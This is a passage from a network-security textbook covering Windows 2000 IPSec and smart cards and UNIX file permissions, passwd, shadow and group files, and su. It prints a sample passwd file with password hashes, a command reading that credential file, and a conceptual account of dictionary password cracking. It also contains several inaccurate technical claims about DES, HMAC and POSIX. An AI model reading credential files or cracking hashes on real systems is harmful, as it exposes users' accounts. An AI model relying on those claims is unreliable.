certificate revocation lists \nPKCS family \nControls format and behavior for public-key exchange and \ndistribution \nSSL ver. 3 \nProvides encryption for Web sessions \nSGC \nProvides SSL-like security without export complications \nIPSec \nProvides encryption for network sessions using IP \nPKINIT \nIs the emerging standard for using public keys to log on to networks \nthat use Kerberos \nPC/SC \nIs a smart card standard \nIPSec \nNT 4.0 did not provide robust and routine network data encryption—a critical weakness in today’s environment of \nmixed networks and global information exchange. W2K includes IP Security Protocol (IPSec) which ensures that \ndata traffic is safe on two basic levels: \nModification Data is protected en route. \nInterception Data cannot be viewed or copied en route \nIPSec is an open standard designed by the IETF for IP, and it supports network-level authentication, data integrity, \nand encryption. Because IPSec in W2K is deployed below the transport level of the OSI model, application-\nspecific configuration is no longer necessary. This also dramatically simplifies VPNs. Additional IPSec services \nprovided by W2K include: \n" }, { "page_number": 307, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 307\nData integrity IP authentication headers ensure data integrity during communications. \nDynamic rekeying Regenerating keys at variable intervals during a session dramatically improves \nprotection against attacks. \nCentralized management W2K administrators can set security policies and filters to define \ngranular security based on user, work group, or other criteria. \nFlexibility IPSec policies can be applied to a single workstation, user, group, or enterprise-wide \ndata communications. \nIPSec provides for privacy, authentication, and non-repudiation by using an authentication header (AH) and \nencapsulated security payload (ESP). The AH provides source authentication and integrity. The ESP provides \nconfidentiality (along with authentication and integrity). With IPSec, only the sender and the recipient know the \nsecurity key. If the authentication data is valid, the receiver knows that the data comes from the purported sender \nand has not been altered in transit. \nMicrosoft has included these industry-standard technologies in their implementation of IPSec: \nDiffie-Hellman The preferred method of sharing keys, Diffie-Hellman starts with the two \nparticipants exchanging public information. Then, each entity combines the other’s public \ninformation along with its own secret information to generate a shared-secret value. \nHash Message Authentication Code (HMAC) Used to verify data integrity, HMAC produces a \ndigital signature for each packet. If the contents of the packet change, the resulting discrepancy is \ncalculated from the encrypted digital signature and the packet is discarded. \nData Encryption Standard (DES) Used to enforce confidentiality, DES uses a secret key \nalgorithm known as cipher block chaining (CBC) to generate a random number that is used with the \nsecret key to encrypt data. \nOther security protocols that support IPSec in W2K are: \nInternet Security Association and Key Management Protocol (ISAKMP) These protocols \ndefine a common framework to support the establishment of security associations (SA). An SA is a \nset of parameters that define the mechanisms (such as keys) for secure communication between two \ncomputers. \nOakley Key Determination Oakley uses Perfect Forward Secrecy (PFS) to make sure that only \ndata directly encrypted by a key can be compromised if the key encryption is broken. It never reuses \na key to compute additional keys and never uses the original key-generation material to compute \nanother key. \nBecause IPSec has been integrated into W2K, it can take advantage of W2K’s PKI services including AD, Group \nPolicies, and Certificate Services. This provides a powerful security advantage to W2K—allowing centralized \nmanagement of all security services. \n" }, { "page_number": 308, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 308\nSmart Cards \nNT 4.0 user authentication methods were limited to passwords, unless third-party products were installed. \nPasswords provide numerous problems including management overhead and personnel issues (users setting weak \nor easily guessed passwords, or frustration with high password turnover). The security industry as a whole has \nturned to more secure and easily managed ways of verifying identity. One of the most popular of these methods \nthat strikes a balance between cost and functionality is the smart card. \nA smart card is a credit card–sized device that uses an integrated circuit to store information, including certificates, \nprivate keys, and any other personal information. Smart cards are used to gain access to computer systems with \nsmart card readers. Typically, a user will swipe (or inset) their smart card through a smart card reader. They are \nthen prompted to enter some additional unique and private information such as a PIN (Personal Identification \nNumber)—similar to the concept of an ATM card. Smart cards, however, store their information not in an \nunencrypted magnetic strip, but in an encrypted format on the integrated circuit. \nSmart cards are very attractive from a security perspective because they enhance software-only solutions such as \nclient authentication, logon, and secure e-mail. Smart cards really exist at the center of several of PKI because they \nƒ \nProvide tamper-resistant storage for protecting private keys along with personal information. \nƒ \nIsolate sensitive security operations (such as authentication, digital signatures, and key \nexchanges) from other parts of the system that do not have a need to know. \nƒ \nProvide portability to credentials and private information between computers at any \ngeographical location (work, home, on the road, etc.). \nTraditionally smart cards have had limited success because of non-standardization. The International Standards \nOrganization (ISO) developed ISO 7816 in an attempt to centralize smart card development. In 1996, Europay, \nMasterCard, and VISA (EMV) defined a specification that adopted ISO 7816 standards and added additional ones \nto support the financial services industry. The European telecommunications industry split the standards process \nby creating their own variant of the ISO 7816 for their Global System for Mobile Communications (GSM) \nspecification to enable identification and authentication of mobile phone users. \nNone of these specifications met the needs of the computer industry, so in 1997 the PC/SC (Personal \nComputer/Smart Card) Workgroup (formed by several industry leaders including Microsoft) released the PC/SC \nspecifications. Also based on ISO 7816, these standards include issues relating directly to information systems. \nMicrosoft implemented the standards using the following technology: \nCryptoAPI This component allows for any Smart Card Service Provider (SCSP) to take advantage \nof cryptographic features integrated into W2K, without having to know cryptography. \nSCard COM A noncryptographic interface, SCard COM allows applications to gain access to \ngeneric smart card services. \nBecause of their integration with W2K services, smart cards can be used as the primary contributor to the PKI of \nan organization, simultaneously providing a high degree of management and risk-avoidance. \n \nSummary \nIn this chapter we discussed how to go about securing an NT server environment. You saw \nhow to manage user accounts, as well as how to set file permissions. We also discussed the \nimportance of installing security patches. Finally, we looked at the new technologies included \nwith Windows 2000 that provide a very powerful, centrally managed infrastructure for network \nsecurity. \nIn the next chapter, we will discuss how to secure a UNIX system. Since many environments \nstill use UNIX for mission-critical applications, the operating system is a strategic component \nof many networking environments. \n" }, { "page_number": 309, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 309\n \nChapter 15: UNIX \nIn order to secure a system running UNIX, you must have a firm handle on how the operating system works. \nWhile most UNIX systems come with some type of GUI, these usually won’t walk you through the process, nor \nare there extensive Help buttons to click that will describe a particular setting and when it should be used. UNIX \nsystems are predominantly managed from the command line, although some utilities have been ported to X-\nWindows. This makes securing a UNIX system extremely difficult for those who are not versed in the operating \nsystem. \nThe reward to learning UNIX is the ability to manage a system that still controls a majority of the world’s critical \ndata. While UNIX has lost market share in the small markets, it is still the major player in supporting mission-\ncritical applications. It also has the ability to become an extremely secure application server. For example, while \nan NT server running Internet Information Server (ISS) requires that the RPC (135) and all NetBIOS ports (137–\n139) be left open and vulnerable, a UNIX system running Apache only requires you to open the ports you actually \nwant to offer services on (such as port 80 for Web). With fewer open ports, it is less likely an attacker will find an \nentry point into your system. \nUNIX History \nDeveloped in 1969 at Bell Labs, UNIX is by far the oldest distributed NOS in use today. Its creation is credited to \nKen Thompson, who was working at that time for Bell Labs on the Multiplex Information Computing System \n(MULTICS) for a General Electric mainframe. Bell Labs eventually dropped the project, and with it went a very \nimportant piece of software: a game called Space Travel. \nIt is rumored that Thompson set out to create a new operating system to which the game could be ported. \nMULTICS assembly code was rewritten for an available DEC PDP-7, and the new operating system was named \nUNICS. \nBell Labs eventually took interest in UNICS, as additional functionality beyond the game Space Travel was added, \nwhich gave the operating system some commercial appeal. By 1972, it was named UNIX and had an install base \nof 10 computers. In 1973, Thompson and Dennis Ritchie rewrote the kernel in C, making the operating system \nmuch more portable. \nIn 1974, the IP protocol was developed and integrated into the UNIX operating system. No longer were multiple \nterminals required to access a single UNIX system. A shared media called Ethernet could be used to access the \nsystem. UNIX had become a true NOS. \nIn the mid-’70s Bell Labs started releasing UNIX to universities. Since Ma Bell was still regulated at the time, it \nwas not allowed to profit from UNIX’s sales. For this reason, only a minimal fee was charged for the UNIX \nsource code, which helped to make it widely available. \nOnce UNIX hit the universities, its development expanded from the injection of fresh blood. Students began \nimproving the code and adding features. So dramatic were these changes at the University of California at \nBerkeley that the university began distributing its own flavor of UNIX: the Berkeley Software Distribution (BSD). \nThe UNIX version that continued to be developed by Bell Labs is known as System V (pronounced “five”). \nBecause UNIX could meet so many needs (and could run on so many platforms), many versions proliferated in the \nearly 1980s. AT&T contributed to this diversity because of its licensing policy at the time; it retained the UNIX \nname, allowing any other distributor to name their own version of UNIX—with results like Solaris (Sun) and HP-\nUX (Hewlett-Packard). Even Microsoft released a version of UNIX called XENIX. \nFinally, in 1987, AT&T along with Sun Microsystems and Microsoft agreed to combine the major versions of \nUNIX into a single distribution. Called System V Release 4 (abbreviated to SVR4), this version combined the best \nfeatures of XENIX, BSD, and System V Release 3—and as a result became a de facto standard well into the \n1990s. In 1993, six other vendors created a standard called COSE (Common Open Software Environment) \nincluding Hewlett-Packard, SCO (The Santa Cruz Operation), SunSoft, Univel, and UNIX System Laboratories. \nThat same year, AT&T sold UNIX to Novell, which in turn sold it to SCO in 1995. Despite the repeated (and \noccasional) efforts to standardize UNIX, it is still a fragmented, but respected operating system. \n" }, { "page_number": 310, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 310\nThe beginning of the 1990s saw another trend—non-commercial clones of the UNIX operating system, most \nnotably FreeBSD and Linux. \nFreeBSD \nFreeBSD was born from a tumultuous legal battle involving Novell and U.C. Berkeley in the early 1990s. \nOriginally developed as patch for an existing i386 version of BSD, then re-created from the bits of the 4.4BSD-\nLite2 version of UNIX remaining after the settlement of the lawsuit between Novell and U.C. Berkeley, FreeBSD \nhas used a controlled development model to create an exceptionally stable (and secure) but free operating system. \nSo how does FreeBSD differ from Linux—in that they both employ an open model when it concerns their source \ncode and price? For starters, FreeBSD is not dependent on any one person—unlike Linux, which is ultimately \ncontrolled by Linus Torvalds. And because FreeBSD inherited so much technology from an earlier, mature version \nof UNIX (BSD), its networking traditionally has been much more robust and has performed better than Linux \n(although that is rapidly changing). A third reason is that Linux takes after the other main family of UNIX, SVR4, \nin terms of file system layout, boot process, and executable standard. And finally, there is the issue of licensing; \nwhile Linux depends on the GNU CopyLeft license (which severely limits the commercial advantages to investing \nin Linux development), FreeBSD has its own license that permits much more commercial investment. \nIn the end, the decision to run FreeBSD over Linux (or even a mainstream version of UNIX) comes down to many \npersonal preferences. One negative, FreeBSD does not support the same extensive range of hardware (such as \nobscure video cards) that Linux does. However, FreeBSD is dramatically easier to update and maintain “in sync” \nwith the latest releases. Some organizations (such as Yahoo!) have decided to overcome the quandary by installing \nboth, taking advantage of the numerous similarities as opposed to the few differences. \nLinux \nThere is a myth (and it is only a myth) that Linux was created to compete against Microsoft. The truth, however, is \nmuch more humble, and, to make a play on an old saying—dissatisfaction is the mother of invention. \nIn 1991, Linus Torvalds, a student at the University of Helsinki in Finland, was frustrated with his choice of \noperating systems that would run on the Intel 386 processor. Not inclined to DOS, and unable to afford the more \nexpensive UNIX versions, he decided to create his own UNIX clone based on a very limited PC clone called \nMinix. Linus then made two decisions that set the stage for the entire culture of open development that has grown \nwith the OS itself: he released (and publicized) the source code on the Internet, and he asked for volunteers to help \nhim further develop the OS. \nLinux had two assets that immediately gave his new OS life: an FTP site at the University of Helsinki (where \nanyone could download the latest—and previous—versions), and a variety of experienced volunteers who added \ndevice drivers, compilers, and code libraries. These elements formed a cohesive whole that allowed anyone to \ndownload a relatively complete operating system (albeit, initially, one without a full feature set). \nOver time, the open source efforts have given Linux a full range of capabilities that are required for the success of \nany NOS—multitasking, memory management, and especially, networking. The open approach to software (with \ncritical changes to the kernel still controlled by Torvalds) has created some hesitation in the business community \n(although it wholly embraces the fact that Linux is technically free of purchasing or licensing costs), simply \nbecause there is no single organization that ensures the commercial orientation or timeline of traditional operating \nsystems. \nHowever, in spite of the reservations that Linux might suffer the same “fragmentation” suffered by UNIX, there \nhas been a dramatic growth in the past few years of corporations that are adopting Linux in core business \napplications, not just for peripheral network services like DNS, DHCP, and HTTP. Combined with the broad \nhardware and platform support, Linux has gained significant commercial support. This includes a 1.15 billion \ndollar investment into Linux by IBM (which, along with Compaq and Dell offer Linux pre-installed on their \nflagship server products) and major application vendors (including Oracle and Informix) porting their products to \nthe Linux platform. \nUNIX File System \nMost UNIX operating systems are POSIX-compliant file systems that accept filenames up to 254 characters. \nNames are case sensitive, so Myfile.txt and myfile.txt would be considered two separate files. POSIX is a high-\nperformance file system that helps to reduce the amount of file fragmentation. \nUNIX uses mount points instead of drive letters when disks are added. A mount point is simply a point in the \ndirectory structure when the storage of the new disk has been added. This provides a cleaner feel to the file \nstructure and helps to consolidate information. \n" }, { "page_number": 311, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 311\nFor example, let’s assume that you are setting up a UNIX machine and that you have two physical hard drives that \nyou wish to use. You want to dedicate the first drive to the operating system, while utilizing the second drive for \nyour users’ home directories. \nInstead of installing the OS on C: and putting the users’ home directories on D:, you would simply assign the \nsecond drive for storage of all files under the /home directory. This would store all files on the primary drive, \nexcept for those located under the home directory. \nThere are a few benefits to this. First, it allows the addition of extra drives to be transparent. If you are looking for \na file and have no idea where it is located, you can simply go to the root and perform a single search. You are not \nrequired to repeat the search for each additional drive, because they have been woven into the fabric of the \ndirectory structure. \nUsing mount points also helps to reduce system-wide failures due to a crashed drive. For example, if your second \ndisk were to fail, you would lose only the users’ home directories, not the entire system. This is in contrast to \nNetWare, which requires you to span the entire volume structure over both disks. If one of those drives fails, none \nof the files on the volume can be accessed. \nUnderstanding UID and GID \nUNIX uses two numbers as part of associating file permissions with their correct user and group. The User ID \n(UID) is a unique number assigned to each logon name on a system. The Group ID (GID) is used to uniquely \nidentify each group. When a file is saved to the system, the user’s UID and GID are saved along with it. This \nallows the UNIX system to enforce access restrictions to the file. For example, if your UID is 501, this \ninformation is recorded with every file you write to the system so that you can be properly identified as the file’s \nowner. \nTwo files are used to store the UID and GID information. These are \npasswd Identifies the UID for each user and the GID of the user’s primary group \ngroup Identifies the GID for each group and lists secondary groups for each user \nWe will discuss the passwd (password) file and the group file in greater detail later in this chapter. For now, just \nbe aware that every user is associated with a unique UID and that every group is associated with a unique GID. \nFile Permissions \nIf UNIX has one major security weakness, it is its file permission settings. Permissions are set by three distinctive \nclasses—owner, group, and everyone. I can set specific permissions for when I access a file, for when anyone in \nmy group accesses a file, or for when anyone else on the system accesses the file. Permission settings are limited \nto read, write, and execute. UNIX does not support some of the more granular permission settings such as change, \nmodify, and delete. \nFor example, let’s assume you have a file called serverpasswords.txt in your home directory (a bad idea, I know, \nbut this is only an example). Let’s also assume that you are part of a group called admin. You can set permissions \non this file so that you can read and write to it, members of the admin group have read-only access, and everyone \nelse on the system has no access. \nThere are a few problems with this setup. First of all, even though “everyone else” has no access, they will still see \nthat the file exists unless you remove all read permissions for the entire directory. Seeing a file may prompt others \nto take further steps and try to access the file, now that they know it is there. While removing all access to a \ndirectory may be acceptable in some cases, it may not be possible to do this in every situation, such as when \nyou’re working with shared file areas. \nAnother problem is that permissions are too general. You cannot say, “Give read and write access for this file to \nSean and Deb from the admin group, but give all other members read-only access.\" UNIX was spawned in a much \nsimpler time, when complicated file access was not required. In fact, for many years the focus was on making \nsystem access easier, not more difficult. \nNote \nThe administrator account called root always has full access to all system files. This \nattribute cannot be removed. \nViewing File Permissions \nYou can receive a listing of directory files by using the ls (list) command. When combined with the -l (long) \nswitch, file permission information is displayed. It is also useful to include the -a (all) switch, as this will show \nhidden files, as well. A sample output from the ls command is as follows: \n" }, { "page_number": 312, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 312\n [granite:~]$ ls -al \ndrwx------ 3 cbrenton user 512 Aug 25 18:15 . \ndrwxr-xr-x 5400 root wheel 95744 Aug 28 17:01 .. \n-rw-r--r-- 1 cbrenton user 0 Oct 31 1997 .addressbook \n-rw-r--r-- 1 cbrenton user 1088 May 6 1997 .cshrc \n-rw-r--r-- 1 cbrenton user 258 May 6 1997 .login \n-rw-r--r-- 1 cbrenton user 176 May 6 1997 .mailrc \n-rw------- 1 cbrenton user 7881 Aug 25 18:15 .pine-debug1 \n-rw------- 1 cbrenton user 8410 Aug 25 16:30 .pine-debug2 \n-rw------- 1 cbrenton user 7942 Aug 25 15:08 .pine-debug3 \n-rw------- 1 cbrenton user 8605 Aug 25 14:49 .pine-debug4 \n-rw-r--r-- 1 cbrenton user 11796 Aug 25 18:15 .pinerc \n-rw-r--r-- 1 cbrenton user 1824 May 6 1997 .profile \n-rw-r--r-- 1 cbrenton user 52 May 6 1997 .profile.locale \n-rw-r--r-- 1 cbrenton user 749 May 6 1997 .shellrc \n-rw------- 1 cbrenton user 2035 Jul 13 14:33 dead.letter \ndrwx------ 2 cbrenton user 512 Aug 25 16:29 mail \nThe first column holds permission information. This output is a string of 10 characters that describes the type of \nentry, as well as the permissions assigned to the entry. Any entry beginning with a dash (-) is identified as a \nregular file. Table 15.1 contains a list of valid first characters and the type of entry each describes. \nTable 15.1: UNIX File Types \nFirst Character \nEntry \nDescription \n- \nFile \nd \nDirectory entry \nl \nSymbolic link to a file in a remote directory \nb \nBlock device (used for accessing peripherals such as tape drives) \nc \nCharacter device (used for accessing peripherals such as \nterminals) \nThe remaining nine characters are broken up into three groups of three characters each. The first group of three \ndescribes the permissions assigned to the file’s owner. In the sample directory listing, all of the files are owned by \nthe user cbrenton. The second group of three characters describes the permissions assigned to the file owner’s \ngroup. In the sample directory listing, cbrenton is a part of the group user; therefore the second group of \npermissions is applied to that group. Finally, the third group of three characters describes the permissions granted \nto everyone else with a valid logon account to the system. Table 15.2 describes the possible permissions. \nTable 15.2: UNIX Permission Settings \nCharacter Entry \nDescription \nr \nEntry can be viewed or accessed in read-only mode. \nw \nEntry can be modified or deleted. If assigned to a directory, new \nfiles can be created, as well. \nx \nIf the entry is a file, it can be executed. If the entry is a directory, it \ncan be searched. \nFor example, the file .login in the sample output would be interpreted as follows: \nƒ \nThis is a regular file (- is the first character). \nƒ \nThe owner of the file can read it (r is the second character). \nƒ \nThe owner of the file can write to it (w is the third character). \nƒ \nThe owner of the file cannot execute it (x is not the fourth character). \nƒ \nThe owner’s group can read it (r is the fifth character). \n" }, { "page_number": 313, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 313\nƒ \nThe owner’s group cannot write to it (w is not the sixth character). \nƒ \nThe owner’s group cannot execute it (x is not the seventh character). \nƒ \nEveryone else can read it (r is the eighth character). \nƒ \nEveryone else cannot write to it (w is not the ninth character). \nƒ \nEveryone else cannot execute it (x is not the tenth character). \nFor a final example, review the last entry, which is for the directory named mail. The owner (cbrenton) has \npermission to read, write, and even search this directory. Everyone else on the system (including the group user) \nhas no permissions to this directory. Anyone else who tries to access this directory will receive a \"permission \ndenied\" error. \nChanging File Permissions \nThe chmod utility can be used to change the permissions assigned to a file or directory. While there are a number \nof variations on the switches you can use, most users find the numeric system easiest to work with. The numeric \nsystem assigns an integer value to the read, write, and execute permissions. The assigned values are as follows: \nƒ \nr (read): 4 \nƒ \nw (write): 2 \nƒ \nx (execute): 1 \nƒ \nNo permissions: 0 \nBy combining the numeric values, you can assign a specific level of access. For example, a numeric value of 6 \nindicates that the read and write permissions should be assigned, but not the execute permission. A numeric value \nof 5 would assign read and execute, but not write. \nWhen working with chmod, permissions are set using a three-digit number. The first digit assigns the permission \nlevel for the owner. The second digit assigns the permission level for the group. Finally, the third digit assigns the \npermission level for all other users on the system. For example, executing the command \nchmod 640 resume.txt \nassigns \nƒ \nRead and write access for the owner of resume.txt (6) \nƒ \nRead-only access for the owner’s group (4) \nƒ \nNo access for all other system users (0) \nAs with any multi-user operating system, you should restrict access permissions as much as possible, while still \nallowing users to perform their jobs. Most UNIX operating systems default to a pretty loose level of permissions, \nso you should review the file system and tighten up restrictions before allowing users access. Unfortunately, users \ndo require at least read access to many of the system files. This can be a problem because it allows them to snoop \naround the system—and perhaps find a vulnerability that will provide a higher level of access. \nChanging File Ownership and Groups \nTwo other utilities for maintaining access control are chown and chgrp. The chown command allows you to \nchange the ownership of a file. This is useful if you need to move or create files and directories. The syntax of the \ncommand is \nchown \nThe most useful switch is -R, which allows you to change ownership through a directory structure recursively. For \nexample, the command \nchown -R lynn * \nwould give Lynn ownership of all files in the current directory as well as any subdirectories located below the \ncurrent location. Lynn would be unable to take ownership of these files by running the chown command herself; \nthe root user would have to run the command for her. \nNote \nRemember: UNIX is case sensitive, so the R must be capitalized. \nThe chgrp command allows you to change the group associated with a file. This is useful if you wish to associate a \nfile with a different group than your primary group. For example, let’s say that the passwd file defines your \nprimary group as users. Let’s assume that you are also a member of the group admin. When you create a file, the \nfile is automatically associated with the group users. If you wish instead to associate this file with the admin \ngroup, you would need to run the command: \nchgrp admin file_name \n" }, { "page_number": 314, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 314\nThis would change the group association of the file to the admin group. Any group permissions that have been set \nwill now be associated with admin, not users. As with the chown command, you can use the -R switch to \nrecursively change the group association of every file in an entire directory structure. \n \nAccount Administration \nUNIX systems can be self-sufficient when it comes to administering users and groups. This means that if you have \nmultiple UNIX systems, account information can be administered separately on each. Many UNIX flavors can \nalso be centrally managed through Network Information Services Plus (NIS+), an updated version of NIS \n(formerly known as Yellow Pages). \nNIS+ is a hierarchical database system designed to share user and group information across multiple systems. A \ncollection of systems sharing NIS information is called a domain. To give a user access to the domain, an \nadministrator simply needs to add that user’s account to the master NIS server. If the user attempts to access a \nsystem within the domain, that system will contact the master in order to validate the user’s logon. This allows the \nuser to gain access to the system, even though there is no local account defined. \nThe Password File \nAll user authentication requests are verified against the password file named passwd. Here is a sample passwd file: \n[cbrenton@thor /etc]$ cat passwd \nroot:Y2YeCL6KFw10E:0:0:root:/root:/bin/bash \nbin:*:1:1:bin:/bin: \ndaemon:*:2:2:daemon:/sbin: \nadm:*:3:4:adm:/var/adm: \nlp:*:4:7:lp:/var/spool/lpd: \nsync:*:5:0:sync:/sbin:/bin/sync \nshutdown:*:6:0:shutdown:/sbin:/sbin/shutdown \nhalt:*:7:0:halt:/sbin:/sbin/halt \nmail:*:8:12:mail:/var/spool/mail: \nnews:*:9:13:news:/var/spool/news: \nftp:*:14:50:FTP User:/home/ftp: \nnobody:*:99:99:Nobody:/: \ncbrenton:7aQNEpErvB/v.:500:100:Chris Brenton:/home/cbrenton:/bin/bash \ndeb:gH/BbcG8yxnDE:501:101:Deb Tuttle:/home/deb:/bin/bash \ndtuttle:zVKShMTFQU4dc:502:102:Deb Tuttle(2):/home/dtuttle:/bin/csh \ntoby:PpSifL4sf5lMc:503:103:Toby Miller:/home/toby:/bin/bash \nEach row indicates authentication information for a single user. Entry fields are separated by a colon (:). From left \nto right, the fields are identified as \nƒ \nThe logon name \nƒ \nThe encrypted password \nƒ \nThe User ID \nƒ \nThe primary GID \nƒ \nThe description for this logon name (usually the user’s full name) \nƒ \nThe location of the user’s home directory \nƒ \nThe shell or command line interpreter for this user \n" }, { "page_number": 315, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 315\nThe root user always has a UID and GID of 0. Processes such as FTP are also assigned a unique UID and GID so \nthat these processes do not have to run on the system as root. This limits the amount of damage an attacker can \ncause by compromising one of these services. \nAny password field that has a value of an asterisk (*) is a locked account. You cannot authenticate to the system \nusing a locked account. Locked accounts are useful for disabling user access or for securing processes that will be \nrunning on the machine. \nTip \nAny account that has a blank or invalid shell entry will be unable to telnet to the system or \nlog on from the console. This is useful if you wish to offer services such as POP and IMAP \nbut do not want to allow people to gain shell access to the system via telnet. \nThe Password Field \nAs you can see from the sample output of our passwd file, the ciphertext of each encrypted password is clearly \nvisible. This is required because users need read access to the passwd file in order to authenticate with the system. \nThis can also be a major security problem: any user with legitimate access to the system can copy the passwd file \nto another machine and attempt to crack user passwords using a brute force attack. \nUNIX uses a very strong encryption algorithm when encrypting user passwords. UNIX uses a twist on 56-bit DES, \nwhere the plain text is all zeros and the encryption key is the user’s password. The resulting ciphertext is then \nencrypted again, using the user’s password as the key. This process is repeated a total of 25 times. \nTo make the final ciphertext even more difficult to crack, a second key is introduced known as a grain of salt. This \nsalt is based on the time of day and is a value between 0 and 4,095. This insures that if two users have identical \npasswords, the resulting ciphertexts will not be identical. For example, look again at the output of the passwd file. \nOne user, Deb Tuttle, has two separate accounts. Even though both accounts use the exact same password, you \nwould never be able to tell from the resulting ciphertext. \nThe salt value used to encrypt the password is the first two characters of the ciphertext. So when the password for \ndeb was created, the salt used was gH, while the salt used for the dtuttle password was zV. When a user \nauthenticates with the system, the salt is extracted from the ciphertext and used to encrypt the password entered by \nthe user. If the two ciphertext values match, the user is validated and permitted access to the system. \nCracking UNIX Passwords \nUNIX is said to use one-way encryption when creating ciphertext for the passwd file. This is because it is not \npractical to try to directly crack a file that has been encrypted 25 times. Also, it is not the data an attacker is trying \nto read; this is a known value of all zeros. An attacker would be trying to find the actual password value, which is \nalso the key. Of course, in order to decrypt the ciphertext you need the key—but if you have the key you already \nhave the user’s password. \nSo how does one go about cracking UNIX passwords? By applying the same process that the system does to \nauthenticate a user. When Woolly Attacker tries to crack a password, he pulls the salt from the ciphertext entry \nwithin the passwd file. He then systematically encrypts a number of words, trying to produce a matching \nciphertext string. When a match is found, Woolly knows he has the correct password. \nNote \nThe file that contains the list of words used for cracking purposes is known as a dictionary \nfile. \nAn attacker cannot reverse-engineer the ciphertext, but he can attempt to guess the right value using a brute force \nattack. This is why it is so important not to use common words or variations on server names and user names for \npasswords. These are typically the first words an attacker will try. \nShadow Passwords \nOne way to resolve the problem of users’ viewing the encrypted passwords within the passwd file is to locate the \nciphertext somewhere else. This is the purpose of the shadow password suite: it allows you to locate the ciphertext \nwithin a file that is only accessible to the root user. This prevents all users on the system from having access to this \ninformation. \nWhen shadow passwords are used, the password field within the passwd file contains only the character x. This \ntells the system that it needs to look in the file named shadow for the password ciphertext. The format of the \nshadow file is identical to the passwd file in that all fields are separated by a colon (:). At a minimum, each line of \nthe shadow file contains the user’s logon name and password. You can optionally include password aging \ninformation, such as the minimum and maximum allowable time before forcing a user to change her password. \nWarning \nIf you decide to use shadow passwords, make sure that any other \nauthentication system you are using is compatible with the shadow format. \nFor example, many older versions of NIS (but not NIS+) expect the password \ninformation to be stored within the passwd file. If you install the shadow \npassword suite on one of these systems, NIS will break—and it is possible \nthat you will no longer be able to gain access to the system. \n" }, { "page_number": 316, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 316\nThe Group File \nAs mentioned earlier in this section, the group file is used to identify the GID associated with each group, as well \nas the group’s members. Most UNIX versions will allow users to be a member of more than one group. A sample \ngroup file is shown here: \ndisk::6:root \nlp::7:daemon,lp \nmem::8: \nkmem::9: \nwheel::10:cbrenton \nmail::12:mail \nnews::13:news \nftp::50: \nnobody::99: \nusers::100:cbrenton,deb,dtuttle,toby \ncbrenton::500:cbrenton \ndeb::501:deb \ndtuttle::502:dtuttle \ntoby::503:toby \nNotice that the users cbrenton, deb, dtuttle, and toby are all members of a unique group that shares their logon \nname, as well as members of the group users. If you refer back to the passwd file, you will see that the primary \ngroup for each of these users is the group that matches his or her logon name. This is a security feature because it \nhelps to prevent users from unintentionally providing more access to a file than was intended. \nWhen a user creates a file, the system provides read and write access for the file’s owner as well as the owner’s \ngroup. This means that if I create a file called resume.txt, everyone in my primary group has write access to this \nfile. This is rather a loose set of permissions to have assigned by default; the user may forget or may not know \nenough to go back and use the chmod command. \nTo resolve this file permission problem, every user is assigned to a unique group. This means that, by default, all \nother users are viewed as “everyone else” and provided only a minimum level of file access (usually read-only). If, \nhowever, I want to allow other users to have a higher level of access to the file, I can use the chgrp command. This \nmeans I have to think about what I am doing before I can grant further access to the file. \nFor example, let’s say the user cbrenton creates a file named smtp.txt. A list of the file would produce the \nfollowing: \n[cbrenton@thor cbrenton]$ ls -al smtp.txt \n-rw-rw-r-- 1 cbrenton cbrenton 499 Feb 5 1997 smtp.txt \nSince the user cbrenton is in a unique group named cbrenton, all other users on the system will have read-only \naccess to the file. If cbrenton wishes to allow deb, dtuttle, and toby to have write access, he can use the chgrp \ncommand to associate this file with the group users. The syntax of the command would be \nchgrp users smtp.txt \nAfter running this command, a new listing of the file smtp.txt would appear as follows: \n[cbrenton@thor cbrenton]$ ls -al smtp.txt \n-rw-rw-r-- 1 cbrenton users 499 Feb 5 1997 smtp.txt \nNow all members of the group users (deb, dtuttle, and toby) would have read and write access to the file smtp.txt. \nAny user on the system who is not part of the group users still has just read-only access to the file. \nThe Wheel Group \nOn a UNIX system, users are allowed to assume the identity of another user using the su command. If no logon \nname is specified with the su command, su defaults to the root account and prompts you for the root user \npassword. Here is an example of using the su command: \n[cbrenton@thor cbrenton]$ whoami \ncbrenton \n[cbrenton@thor cbrenton]$ su \nPassword: \n" }, { "page_number": 317, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 317\n[root@thor cbrenton]# whoami \nroot \n[root@thor cbrenton]# who am i \nthor.foobar.com!cbrenton ttyp0 Aug 30 23:34 (192.168.1.25) \n[root@thor cbrenton]# \nFirst, I verify my current logon name. As you can see from the output of the whoami command, the system \nidentifies me as cbrenton. I then type in su with no switches, and the system prompts me for the root user’s \npassword. Once I have entered the password, a repeat of the whoami command identifies me as now being the root \nuser. Notice that if I use the who am i command, the system still knows my true identity. \nThis is extremely useful for tracking who has assumed administrator privileges. If I check the final entry in the \n/var/log/messages file, I find the following entry: \nAug 30 23:34:56 thor su: cbrenton on /dev/ttyp0 \nThis tells me who assumed root-level privileges and at what time the event occurred. If I am worried that a user \nimproperly assuming root may attempt to delete this entry in order to cover his tracks, I can use syslog in order to \nexport all log entries to a remote system. \nOne way to reduce the number of people capable of assuming root-level privileges is through the use of the wheel \ngroup entry within the group file. Only members of the wheel group are allowed to assume root-level privileges. If \nyou review the group file in this section, you will see that only the user cbrenton is allowed to su to root. This \nmeans that even if the user deb knows the root-level password, she cannot assume root from her account. She must \neither log on to the system directly as the root user or by first breaking into the account cbrenton. This makes it far \nmore difficult to compromise the root-level account. \nLimit Root Logon to the Local Console \nAs mentioned in the last section, if Deb knows the root-level password she can circumvent the wheel group \nsecurity by logging on to the system directly as root. This is a bad thing, because we now lose the ability to log \nthese sessions. Clearly, it would be beneficial to be able to limit the types of connections that the root user can \nmake with the system. \nFor example, you could limit the root account so that logon is only permitted from the local console. This means \nthat someone must gain physical access to the machine in order to directly log on as the root user. This also means \nthat any users connecting to the system remotely (with a program such as telnet) will be forced to first log on as \nthemselves and then su to root. This would allow you to enforce the wheel group restrictions for all remote users. \nMost 